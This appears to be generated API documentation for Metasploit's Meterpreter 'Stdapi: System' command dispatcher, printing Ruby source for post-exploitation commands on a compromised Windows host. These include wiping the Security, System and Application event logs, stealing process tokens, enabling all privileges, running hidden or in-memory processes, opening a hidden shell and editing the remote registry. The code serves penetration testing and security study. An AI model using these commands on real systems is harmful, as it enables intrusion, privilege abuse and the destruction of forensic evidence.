Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Stdapi::Sys

Inherits:

Object

• Object
• Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Stdapi::Sys

Includes:

Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

Defined in:

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb

Overview

The system level portion of the standard API extension.

Constant Summary

Klass =

Console::CommandDispatcher::Stdapi::Sys

@@execute_opts =

Options used by the ‘execute’ command.

Rex::Parser::Arguments.new(
"-a" => [ true,  "The arguments to pass to the command."                   ],
"-c" => [ false, "Channelized I/O (required for interaction)."             ],
"-f" => [ true,  "The executable command to run."                          ],
"-h" => [ false, "Help menu."                                              ],
"-H" => [ false, "Create the process hidden from view."                    ],
"-i" => [ false, "Interact with the process after creating it."            ],
"-m" => [ false, "Execute from memory."                                    ],
"-d" => [ true,  "The 'dummy' executable to launch when using -m."         ],
"-t" => [ false, "Execute process with currently impersonated thread token"],
"-k" => [ false, "Execute process on the meterpreters current desktop"     ],
"-s" => [ true,  "Execute process in a given session as the session user"  ])

@@reg_opts =

Options used by the ‘reg’ command.

Rex::Parser::Arguments.new(
"-d" => [ true,  "The data to store in the registry value."                ],
"-h" => [ true,  "Help menu."                                              ],
"-k" => [ true,  "The registry key path (E.g. HKLM\\Software\\Foo)."       ],
"-t" => [ true,  "The registry value type (E.g. REG_SZ)."                  ],
"-v" => [ true,  "The registry value name (E.g. Stuff)."                   ])

Instance Attribute Summary

Attributes included from Ui::Text::DispatcherShell::CommandDispatcher

#shell, #tab_complete_items

Instance Method Summary

• #cmd_clearev(*args) ⇒ Object

  Clears the event log.

• #cmd_drop_token(*args) ⇒ Object

  Drops any assumed token.

• #cmd_execute(*args) ⇒ Object

  Executes a command with some options.

• #cmd_getpid(*args) ⇒ Object

  Gets the process identifier that meterpreter is running in on the remote machine.

• #cmd_getprivs(*args) ⇒ Object

  Obtains as many privileges as possible on the target machine.

• #cmd_getprivs_help ⇒ Object
• #cmd_getuid(*args) ⇒ Object

  Displays the user that the server is running as.

• #cmd_kill(*args) ⇒ Object

  Kills one or more processes.

• #cmd_ps(*args) ⇒ Object

  Lists running processes.

• #cmd_reboot(*args) ⇒ Object

  Reboots the remote computer.

• #cmd_reg(*args) ⇒ Object

  Modifies and otherwise interacts with the registry on the remote computer by allowing the client to enumerate, open, modify, and delete registry keys and values.

• #cmd_rev2self(*args) ⇒ Object

  Calls RevertToSelf() on the remote machine.

• #cmd_shell(*args) ⇒ Object

  Drop into a system shell as specified by %COMSPEC%.

• #cmd_shutdown(*args) ⇒ Object

  Shuts down the remote computer.

• #cmd_steal_token(*args) ⇒ Object

  Tries to steal the primary token from the target process.

• #cmd_sysinfo(*args) ⇒ Object

  Displays information about the remote system.

• #commands ⇒ Object

  List of supported commands.

• #name ⇒ Object

  Name for this dispatcher.

Methods included from Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

check_hash, #client, #initialize, #log_error, #msf_loaded?, set_hash

Methods included from Ui::Text::DispatcherShell::CommandDispatcher

#cmd_help, #cmd_help_tabs, #initialize, #print, #print_error, #print_good, #print_line, #print_status, #tab_complete_filenames, #update_prompt

Instance Method Details

#cmd_clearev(*args) ⇒ Object

Clears the event log

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 180

def cmd_clearev(*args)

	logs = ['Application', 'System', 'Security']
	logs << args
	logs.flatten!

	logs.each do |name|
		log = client.sys.eventlog.open(name)
		print_status("Wiping #{log.length} records from #{name}...")
		log.clear
	end
end

#cmd_drop_token(*args) ⇒ Object

Drops any assumed token.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 465

def cmd_drop_token(*args)
	print_line("Relinquished token, now running as: " + client.sys.config.drop_token())
end

#cmd_execute(*args) ⇒ Object

Executes a command with some options.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 78

def cmd_execute(*args)
	if (args.length == 0)
		args.unshift("-h")
	end

	session     = nil
	interact    = false
	desktop     = false
	channelized = nil
	hidden      = nil
	from_mem    = false
	dummy_exec  = "cmd"
	cmd_args    = nil
	cmd_exec    = nil
	use_thread_token = false

	@@execute_opts.parse(args) { |opt, idx, val|
		case opt
			when "-a"
				cmd_args = val
			when "-c"
				channelized = true
			when "-f"
				cmd_exec = val
			when "-H"
				hidden = true
			when "-m"
				from_mem = true
			when "-d"
				dummy_exec = val
			when "-k"
				desktop = true
			when "-h"
				print(
					"Usage: execute -f file [options]\n\n" +
					"Executes a command on the remote machine.\n" +
					@@execute_opts.usage)
				return true
			when "-i"
				channelized = true
				interact = true
			when "-t"
				use_thread_token = true
			when "-s"
				session = val.to_i
		end
	}

	# Did we at least get an executable?
	if (cmd_exec == nil)
		print_error("You must specify an executable file with -f")
		return true
	end

	# Execute it
	p = client.sys.process.execute(cmd_exec, cmd_args,
		'Channelized' => channelized,
		'Desktop'     => desktop,
		'Session'     => session,
		'Hidden'      => hidden,
		'InMemory'    => (from_mem) ? dummy_exec : nil,
		'UseThreadToken' => use_thread_token)

	print_line("Process #{p.pid} created.")
	print_line("Channel #{p.channel.cid} created.") if (p.channel)

	if (interact and p.channel)
		shell.interact_with_channel(p.channel)
	end
end

#cmd_getpid(*args) ⇒ Object

Gets the process identifier that meterpreter is running in on the remote machine.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 164

def cmd_getpid(*args)
	print_line("Current pid: #{client.sys.process.getpid}")

	return true
end

#cmd_getprivs(*args) ⇒ Object

Obtains as many privileges as possible on the target machine.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 438

def cmd_getprivs(*args)
	if args.include? "-h"
		cmd_getprivs_help
	end
	print_line("=" * 60)
	print_line("Enabled Process Privileges")
	print_line("=" * 60)
	client.sys.config.getprivs.each do |priv|
		print_line("  #{priv}")
	end
	print_line("")
end

#cmd_getprivs_help ⇒ Object

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 424

def cmd_getprivs_help
	print_line "Usage: getprivs"
	print_line
	print_line "Attempt to enable all privileges, such as SeDebugPrivilege, available to the"
	print_line "current process.  Note that this only enables existing privs and does not change"
	print_line "users or tokens."
	print_line
	print_line "See also: steal_token, getsystem"
	print_line
end

#cmd_getuid(*args) ⇒ Object

Displays the user that the server is running as.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 173

def cmd_getuid(*args)
	print_line("Server username: #{client.sys.config.getuid}")
end

#cmd_kill(*args) ⇒ Object

Kills one or more processes.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 196

def cmd_kill(*args)
	if (args.length == 0)
		print_line(
			"Usage: kill pid1 pid2 pid3 ...\n\n" +
			"Terminate one or more processes.")
		return true
	end

	print_line("Killing: #{args.join(", ")}")

	client.sys.process.kill(*(args.map { |x| x.to_i }))

	return true
end

#cmd_ps(*args) ⇒ Object

Lists running processes.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 214

def cmd_ps(*args)
	processes = client.sys.process.get_processes
	tbl = Rex::Ui::Text::Table.new(
		'Header'  => "Process list",
		'Indent'  => 1,
		'Columns' =>
			[
				"PID",
				"Name",
				"Arch",
				"Session",
				"User",
				"Path"
			])

	processes.each { |ent|

		session = ent['session'] == 0xFFFFFFFF ? '' : ent['session'].to_s
		arch    = ent['arch']

		# for display and consistency with payload naming we switch the internal 'x86_64' value to display 'x64'
		if( arch == ARCH_X86_64 )
			arch = "x64"
		end

		tbl << [ ent['pid'].to_s, ent['name'], arch, session, ent['user'], ent['path'] ]
	}

	if (processes.length == 0)
		print_line("No running processes were found.")
	else
		print("\n" + tbl.to_s + "\n")
	end

	return true
end

#cmd_reboot(*args) ⇒ Object

Reboots the remote computer.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 254

def cmd_reboot(*args)
	print_line("Rebooting...")

	client.sys.power.reboot
end

#cmd_reg(*args) ⇒ Object

Modifies and otherwise interacts with the registry on the remote computer by allowing the client to enumerate, open, modify, and delete registry keys and values.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 265

def cmd_reg(*args)
	# Extract the command, if any
	cmd = args.shift

	if (args.length == 0)
		args.unshift("-h")
	end

	# Initiailze vars
	key   = nil
	value = nil
	data  = nil
	type  = nil

	@@reg_opts.parse(args) { |opt, idx, val|
		case opt
			when "-h"
				print_line(
					"Usage: reg [command] [options]\n\n" +
					"Interact with the target machine's registry.\n" +
					@@reg_opts.usage +
					"COMMANDS:\n\n" +
					"    enumkey    Enumerate the supplied registry key [-k <key>]\n" +
					"    createkey  Create the supplied registry key  [-k <key>]\n" +
					"    deletekey  Delete the supplied registry key  [-k <key>]\n" +
					"    queryclass Queries the class of the supplied key [-k <key>]\n" +
					"    setval     Set a registry value [-k <key> -v <val> -d <data>]\n" +
					"    deleteval  Delete the supplied registry value [-k <key> -v <val>]\n" +
					"    queryval   Queries the data contents of a value [-k <key> -v <val>]\n\n")
				return false
			when "-k"
				key   = val
			when "-v"
				value = val
			when "-t"
				type  = val
			when "-d"
				data  = val
		end
	}

	# All commands require a key.
	if (key == nil)
		print_error("You must specify a key path (-k)")
		return false
	end

	# Split the key into its parts
	root_key, base_key = client.sys.registry.splitkey(key)

	begin
		# Rock it
		case cmd
			when "enumkey"
				open_key = client.sys.registry.open_key(root_key, base_key)

				print_line(
					"Enumerating: #{key}\n")

				keys = open_key.enum_key
				vals = open_key.enum_value

				if (keys.length > 0)
					print_line("  Keys (#{keys.length}):\n")

					keys.each { |subkey|
						print_line("\t#{subkey}")
					}

					print_line
				end

				if (vals.length > 0)
					print_line("  Values (#{vals.length}):\n")

					vals.each { |val|
						print_line("\t#{val.name}")
					}

					print_line
				end

				if (vals.length == 0 and keys.length == 0)
					print_line("No children.")
				end

			when "createkey"
				open_key = client.sys.registry.create_key(root_key, base_key)

				print_line("Successfully created key: #{key}")

			when "deletekey"
				client.sys.registry.delete_key(root_key, base_key)

				print_line("Successfully deleted key: #{key}")

			when "setval"
				if (value == nil or data == nil)
					print_error("You must specify both a value name and data (-v, -d).")
					return false
				end

				type = "REG_SZ" if (type == nil)

				open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)

				open_key.set_value(value, client.sys.registry.type2str(type), data)

				print_line("Successful set #{value}.")

			when "deleteval"
				if (value == nil)
					print_error("You must specify a value name (-v).")
					return false
				end

				open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)

				open_key.delete_value(value)

				print_line("Successfully deleted #{value}.")

			when "queryval"
				if (value == nil)
					print_error("You must specify a value name (-v).")
					return false
				end

				open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)

				v = open_key.query_value(value)

				print(
					"Key: #{key}\n" +
					"Name: #{v.name}\n" +
					"Type: #{v.type_to_s}\n" +
					"Data: #{v.data}\n")

			when "queryclass"
				open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)

				data = open_key.query_class

				print("Data: #{data}\n")
			else
				print_error("Invalid command supplied: #{cmd}")
		end
	ensure
		open_key.close if (open_key)
	end
end

#cmd_rev2self(*args) ⇒ Object

Calls RevertToSelf() on the remote machine.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 420

def cmd_rev2self(*args)
	client.sys.config.revert_to_self
end

#cmd_shell(*args) ⇒ Object

Drop into a system shell as specified by %COMSPEC%

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 153

def cmd_shell(*args)
	path = client.fs.file.expand_path("%COMSPEC%")
	path = (path and not path.empty?) ? path : "cmd.exe"
	cmd_execute("-f", path, "-c", "-H", "-i", "-t")
end

#cmd_shutdown(*args) ⇒ Object

Shuts down the remote computer.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 488

def cmd_shutdown(*args)
	print_line("Shutting down...")

	client.sys.power.shutdown
end

#cmd_steal_token(*args) ⇒ Object

Tries to steal the primary token from the target process.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 454

def cmd_steal_token(*args)
	if(args.length != 1 or args[0] == "-h")
		print_error("Usage: steal_token [pid]")
		return
	end
	print_line("Stolen token with username: " + client.sys.config.steal_token(args[0]))
end

#cmd_sysinfo(*args) ⇒ Object

Displays information about the remote system.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 472

def cmd_sysinfo(*args)
	info = client.sys.config.sysinfo
	width = "Meterpreter".length
	info.keys.each { |k| width = k.length if k.length > width and info[k] }

	info.each_pair do |key, value|
		print_line("#{key.ljust(width+1)}: #{value}") if value
	end
	print_line("#{"Meterpreter".ljust(width+1)}: #{client.platform}")

	return true
end

#commands ⇒ Object

List of supported commands.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 48

def commands
	{
		"clearev"  => "Clear the event log",
		"execute"  => "Execute a command",
		"getpid"   => "Get the current process identifier",
		"getuid"   => "Get the user that the server is running as",
		"getprivs" => "Attempt to enable all privileges available to the current process",
		"kill"     => "Terminate a process",
		"ps"       => "List running processes",
		"reboot"   => "Reboots the remote computer",
		"reg"      => "Modify and interact with the remote registry",
		"rev2self" => "Calls RevertToSelf() on the remote machine",
		"sysinfo"  => "Gets information about the remote system, such as OS",
		"shell"    => "Drop into a system command shell",
		"shutdown" => "Shuts down the remote computer",
		"steal_token" => "Attempts to steal an impersonation token from the target process",
		"drop_token"  => "Relinquishes any active impersonation token.",
	}
end

#name ⇒ Object

Name for this dispatcher.

# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb', line 71

def name
	"Stdapi: System"
end